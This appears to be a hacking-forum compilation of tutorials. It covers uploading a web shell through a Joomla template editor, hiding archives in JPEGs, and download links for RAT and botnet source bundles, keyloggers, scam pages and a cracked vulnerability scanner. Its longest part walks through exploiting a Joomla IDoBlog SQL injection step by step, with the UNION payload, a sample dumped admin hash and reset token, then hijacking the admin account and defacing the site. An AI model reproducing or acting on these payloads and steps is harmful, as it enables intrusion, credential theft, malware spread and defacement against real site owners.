HOW TO UPLOAD SHELL IN JOOMLA

Hello Guys after seeing response to my last article on how to upload shell in wordpress.

I thought of making tut on showing step's on uploading shell in joomla.

Steps

1. Suppose we have an access to joomla admin. 

2.  Once you Login you see the below screen.

3. Then look for Extensions and in that Template Manager.

4. Once you click on that you will see all the templates installed on that site.

 5. See the marking in red it has the star. It means its the default template used by the sites currently. Select any of the template like it did beez in green.

6. Once you click on beez you will see the following screen. now just click on edit html


8. Once you click on edit html you will see the following screen

see the red part /templates/beez/index.php that is the path of your shell


9. Now just paste your shell code over their and save it

10. Once you click on save. it will take you to page were it will show you Template source saved.you work is done

Once that is done you can access your shell. Path of the shell would be
www.site.com/templates/beez/index.php

Hide Your Files Into A Picture

1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden – RECOMMENDED).
2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).

3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.
4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.
5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) – Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both.
6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .

Note:
You can do the same with zip files it does not need to do with only rar files. 

Set Automatic Screen Refresh

When you are working on your local computer and want to refresh any changes in your system automatically. For example some times you are watching sports results, online Stock Exchange rates and any changes to your hard drive but these changes are not usually refreshed until you press the F5 key on your keyboard.

To refresh your screen automatically you should edit your system Registry. But the best technique to edit the windows registry keys, always export or backup the whole windows registry keys on backup drive before editing. Because any mistake in Registry can cause serious problem in your computer to run properly.

Follow the given steps to change the updates automatically.

1. First click on Start button then type Regedit in Run option.

2. In Registry Editor panel go to the path:

3. HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/UpdateMode

4. Here in right hand side panel edit the DWORD value to be between 1 and 5.

5. Now restart your computer after any changes to go into effect. 

Best virus ever

Note:This virus is very harmful use it an our own risk.This virus includes allot of sources and some builders.

Code:

Includes alot of sources and builders, use at own risk.
Rats:
- + Lost door v 4.2.2+
- Schwarze Sonne 0.2 Final
- Puppet Master 1.1
- Slh Rat
- Spy-Net v2.6
- MiniRAT 0.5c
- Ah32IPrAt v 2.0 FW
- Igloo 1.5
- SockScratch
- Dark Angel Ver 1.0
- Institution 2004 0.2.6
- Coolvibes 0.6 beta


Bots:
- Raedbot Mac b0tnet source c0de
- PUBLIC
-1.4 xr
-2.1 xr
-Bio zombie Orginal
-BioZombie 1.5 (mod)
-Gb DDosEr
-MeTuS Client 3.0.3
-Metus 2.8 Delphi
-Metus GB Edition
-120-MSSQL-SYM-NTPASS-VNC-NETAPI-2007
-120-PSTORE-MSSQL-SYM-NTPASS-VNC-NETAPI-2007
-120-[BruteTest]-V0.5
-120-[DVNC-TEST]-DDOS-V1.0
-120-[ModBot]-SNIFF-SP2-KEYLOG-NICK-VNCBRUTE
-120-[ModBot]-SNIFF-VNCBRUTE-SP2FIX-NICK
-120-[ModBot]-SP2FIX-SYM-VNCBRUTE
-120-[ModBot]-V0.5
-120-[ModBot]-V1.0
-120-[ModBot]-VNCBRUTE-MSSQL-2007
-120-[SP2-PATCH-BRUTE]-V2.0
-120-[SP2-PATCH]-V2.0
-120-[SP2FIX-VNCBrute-Mohaa]-STRIP V1.0
-120-[SP2FIX-VNCBrute-Mohaa]-Test V1.0
-120-[SP2fix-VncBrute]-FINALV1.0
-120-[netapi-sym-mohaa]-(vncbrute-sp2patch)
-@@ SKUZ FIXED DDOS @@
-AkBot-x0r-dns
-AkBot_IRC-VERSION_DLL-DNS
-AkBot_IRC-VERSION_DLL
-AkBot_IRC_-lsd_mod
-Akbot_v0.4.1_netapi_
-C#_BASE
-CYBERBOTv2.2-Stable.m0dd_ownz.DreamWoRK
-Dbot.v3.1
-GENTOOreptile-base
-H-Bot M0d 3.0 M0dd3d by TH & Sculay
-IMBot v4.1
-IMbotMod_V4.1
-NESBOT_v5
-NITE-AIM
-NZM updated by Taquito
-RAR_Password_ Cracked_v4[1].12(iimad)
-RX-120-MYSQL-V2
-RX-120-MYSQL-V999
-RX-120-MYSQL1THREAD-V2
-RX-120-MYSQLBRUTE-V2
-RX-GUTTED
-RX-STRIP-BOTKILLER-0.5
-RXB()tM()d-VNC-NETAPI-ASN-2006
-Rose v1.3 2007 by DreamWoRK
-Rouge-Bots_xdcc
-Ruffbot1.2-MassAsnPrivShit-150705
-Rx120-VnC-Brute+pStore
-Rxbot v8 Ftp+Tftp
-Rxbot v8 Ftp-Tftp
-Rxbot-ak-0.7-Modded.by.Uncanny
-Rxbot-ak-7.7-fira-pviv8
-Rxbot_7.6-Modded-Tr0gdor
-SDBOTNTSharesHardCorePrivM0D
-SDBot_with_NB spreader
-SDbot05b-getadm
-SKUZ-NETAPI_VNC_ASN-2006
-Sdbot_Hardcore_Mod_By_StOner
-SkuZ-Netapi-VNC-IM
-SkuZ-Netapi-Vnc-M0D-XXX-06-BuZ
-SkuZ-Netapi-Vnc-Sym-IM-2007
-SkuZ-VNC-NETAPI-SYM-SP2-MOD
-SkuZ-VNC-TFTP-GOOD-2006
-SkuZ-VnC-NeTaPi-BaN-2006
-SnRxBot
-SpazBot
-Stripped-RXV8
-TSGH v5
-VBbot
-VIRC
-Wiseg3ck0-AIM-DDOS-
-X-Bot
-[RxBot.F-UP.lsass+sasser.ftpd.1]
-[sHk-Bot.svchost-ns-dev.NOT-FOR-RELEASE]
-_dkcs_ddos_bot
-abot
-aspergillus base
-boats
-bot
-bothacker
-db31
-db31x2007
-dbot
-dopebot0.22
-harvecter_bot
-hellbot10-06-05
-myudf
-nekilla
-niggerbot-vnc-nocrypt
-nzmlite+sym
-nzmlite
-rBoT_oTh3R-dImeNsIoN_4.4x
-rBot v0.6.6 priv lsass
-rBot-0.3.2-SMOD-RPMiSO-EDiTION
-rBot-nzm-m0d
-rBot.(rXBot).FTPD.iTALY_DoS_Resilient_RPMiSO_Final_Mod
-rBot.Antrhax.lsass.optix.masterpass
-rBot0.3.3Pub
-rBot_(rXbot)DoS_ResilienT_7252004
-rBot_(rxbot)_041504-dcom-lsass-priv-fixedOptix
-rBot_060104_RxBot_v0.6.6a.pk_Isass_VG_Pr1v8
-rBot_060104_RxBot_v0.7.8.pk_Isass_VG_Pr1v8
-rBot_dimensionfix_v.4.3
-rKxbot022b
-rX_lsdigital_Mod_priv
-ravbot
-rbot-0.3.2-fix1-public
-rbot-incv3b
-rbot0.2-scionix-102b-working
-rbot_blood_mod
-rbot_dnsquery2007
-reptile-pnp
-reptile.03.PNP.ASN
-reptile.03.PNP.ASN_improved-psniff-undetected_VNC
-rx v8-FINAL
-rx-ASN_MOD
-rx-asn-2-re-worked v3
-rx-mp
-rx-sky2kpnpprivate
-rx
-rxBot v0.7.7 Sass
-rxBot-FTPD
-rxBot-sxt-harro
-rxBot0.6.6d-priv+stable-CoKeHeAd
-rxBot0.6.6d-priv-lsass2-bleh
-rxBot_v0.7.7_Sass-priv8
-rx_dev+service+working_lsass+sasser+ftpd
-rxbot-EcLiPsE1.1.priv
-rxbot69Dfix
-rxbot7.5
-rxbot_v0.6.5_pk__lsdigital_spreader
-rxhellbot_v8.8
-sd with fake xdcc by Synco
-sd_fake_xdcc_by_Synco
-sdbot-b0rg-by-okasvi
-sdbot-ntpass-codefix-nils-22.10.03
-sdbot-syn-nbspread
-sdbot04b
-sdbot04b
-sdbot05a
-sdbot05a
-sdbot05b-AE
-sdbot05b-ago
-sdbot05b
-sdbot05b[skbot]_mods_by_sketch
-sdbot05b_skbot__mods_by_sketch
-sdbot05b_syn_&_nick
-sdbot_syn
-sdbot_syn_secure_1
-sdbot_synx
-sdbotconstant_nick_mod
-sdboti3s
-sdbotvnc
-sdnbbot_sp2mod_wks_kelvir
-shadowbotv3-skysyn
-shadowbotv3
-skybot
-spybot1.3
-spybot1.4
-tbot-mod
-unk stripped
-wisdom
-wisdom_phr0st_modd
-woopiebot
-xTBot.0.0.2-priv
-zunker
-zunkerbot
- Lounger Webdowloader 2.0

Code:

http://www.mediafire.com/?zcdlhkzjo

........................................................................................................................................................ 

Download all software needed by hacker & cracker's

Download link: https://rapidshare.com/#!downloa1|106067896|FullHackPack.2008.zip|59141|R~47EC8E7F230AE5527A1A09653E923558|0|0


Software inside :- - Anon FTP
- Arpinject
- Aspack21
- Atk-2.1
- Bios Pas Remover
- BlasterW32
- Blue
- BMP Ripper
- Brutus
- CASXM138
- CAYZODQF
- CGI Founder v1.043
- CGI Sscan
- Cia10
- Cragle
- Crack Zip
- Davs TR Retail
- Deep Un Freeze
- Dr VBS
- EES Binder
- FTP BR
- Genexe
- Grinder 1.1
- Hack Flash Tempelate
- Hack My Space
- Hack Photoshop CS2
- Hackers Assistant
- Hack the game
- H C K
- HL Boom
- Hotmail Scam Page
- Hydra
- John
- Key Logger
- Legion NetmBios Scanner
- Mail Bomb_2.0 YAHOO
- MIDNITE massacren
- NFO Maker
- Nimda
- Nkedb
- NT Packer
- NTS
- Null Ass Frontend
- P0kes WormGen
- Panther
- Pkp BB pass extractor
- phpBBAttacker
- Pqwak2
- Proxy Pro
- Rainbow crack
- Res Hacker
- Rocket
- RPC
- Rpc scan
- Sasser
- Send Mailer
- Show Pass
- Site Digger
- Smbat- win32bin
- SMB Die
- SMB Proxy
- Sprut
- Stealth- HTTP Scanner
- Super
- TFTPD32
- T Hunter
- Tina soft KILL
- UPD Flood
- Ultra Dos
- Visa Spam
- X Pass
- Yahoo Password
- Zehir
- Addr View
- AOL View
- App To Service
- Astaroth Joiner
- Bank Of America
- Cable Modem Sniffer
- Cap Keys DIGITAL
- C Ports
- C C Generator
- DDL Sites
- eBay
- E Gold.
- E-mail Cracker
- Database Defacer
- F.B.I. Binder
- FTP Brute Forcer
- Fuck Mail Bomber
- PhpBB_exploit_pack
- Google Hacker
- Hook Tool Box
- Hotmail Email Hacker
- Hotmail Hack
- HSBC-US
- Iecv
- IP2
- Ip Net Info
- Key Chenger
- Moore R. Port Scanner
- Msn Flooder
- Msn Account Cracker
- Msn Loader
- NET BIOS Scaner
- Net bios name scanner
- Net Res View
- NO limit cracker
- On-Off MSN
- OS Update Hack
- Pay Pal
- PC Any Pass
- Php Nuke Hacker
- phpBB Annihilator
- phpbb bruteforcer.
- phpBB_DoS
- phpBB_spammer
- phpBBAttacker
- phpBBcracker
- php Bug Scan
- PHP Fucker
- PhpNuke_ bypass
- Ping & Nukes
- Port Listener
- procexp
- Pro Mo
- phpBB Email harvester
- Remote Shut Down
- Server 2003 Keygen
- Server Killer
- Source Checker
- Source codes
- SQL Scan
- Super Scan
- Traceroute
- UC.Forum Spam
- USBank
- Win XP Activator
- Win XP Corperate Keygen
- Who is td
- Warez Sites
- Win Admin pass Hack
- Yahoo Ultra Cracker
- Web Cracker
- Win Xp Key Changer
- Win XP Key Viewer
- XP lizer
- Window Hide
- www Hack
- Win XP KeyGen.

Hack about 80% of every website out there

All right,
You kids need to stop asking for someone else to hack your "friends" forum, your girlfriends myspace page, etc.

You want to learn to hack, stop asking stupid questions.

There is ONE tool, that was created originally to protect from hackers. Unfortunately, it's one of the best friends a hacker will ever have :

It's called Acunetix.

Acunetix is a tool that scans websites for known vulnerabilities. It will list all possible sql, xss, html injections, all java injections, all passwords and database weaknesses, all ftp weaknesses, etc. All form submissions exploits that the website can be targeted with. Remote upload and download vulnerabilities.

It will work in 80% of the cases, its database is updated regularly, but websites with latest updates and a good admin might not be targetable.

So here's the thing. Before you post anymore questions such as : "Can this website be hacked ?" or "How do I hack this forum ?", download Acunetix in the link below (I couldn't be bothered uploading a new one).

DOWNLOAD :Acunetix Full Version HERE

PASSWORD : hf.net
(Uploaded by me, 100% clean)

Simply install it and copy the crack folder content into your Acunetix folder (replace files), and when you start the program, click on New Scan, follow the steps.

It will answer most of your questions. Take any known website, scan them and you'll find lots of little "medium risk" security problems etc. The program will explain what the potential harms are, not how to do them. The rest is up to you, do a bit of research, learn by yourself.

So use Acunetix, and stop asking stupid things that just make people think you have a pea for a brain.

Oh, and last tip : http://www.google.com is your friend. Don't forget it before you ask anything else.

Regards

How to Hack Joomla

How to hack Joomla!
Level: NFN (Not For Noobs)

Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge

DISCLAIMER:

THIS TUTORIAL IS FOR EDUCATION PURPOSE ONLY!!! YOU MAY NOT READ THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. ME AS AUTHOR OF THIS TUTORIAL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.

NOTE:

USE ANONYMOUS PROXY!!!

Introduction

Joomla! as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish!!!

But people still hacked sites that use Joomla as Content Management System?!?

Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules mede by that other developers are weak spots!

I hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!

Finding Exploit And Target

Those two steps could go in different order, depend what you find first target or exploit...

Google dork: inurl:"option=com_idoblog"

Comes up with results for about 140,000 pages

At inj3ct0r.com search for: com_idoblog

Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

==

Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

==

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, ​11,12,13,14,15,16+from+jos_users--

Exploit can be separated in two parts:

Part I

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)

Part II

+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users--

This part looking for username and password from jos_users table

Testing Vulnerability

Disable images for faster page loading:

[Firefox]

Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'

Go to:

Code:

http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22

Site load normally...

Go to:

Code:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

Site content blog Profile Admin

Go to:

Code:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--

Site is vulnerable

Inject Target

Open reiluke SQLiHelper 2.7

In Target copy

Code:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

and click on Inject

Follow standard steps until you find Column Name, as a result we have

Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see

our target use jos153_users table for storing data

Let Dump username, email, password from Column Name jos153_users. Click on Dump Now

username: admin

email: info@site.com

password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a

32 character salt that is appended to the end of the password string. The password is stored as

{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...

The easiest way to hack is to reset Admin password!

Admin Password Reset

Go to:

Code:

http://www.site.com/index.php?option=com_user&view=reset

This is standard Joomla! query for password reset request

Forgot your Password? page will load.

In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.

If you find right admin email, Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

username: admin

activation: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.

If you done everything ok, Rest your Password page will load. Enter your new password...

After that go to:

Code:

http://www.site.com/administrator/

Standard Joomla portal content management system

Enter username admin and your password, click on Login

Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML

In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail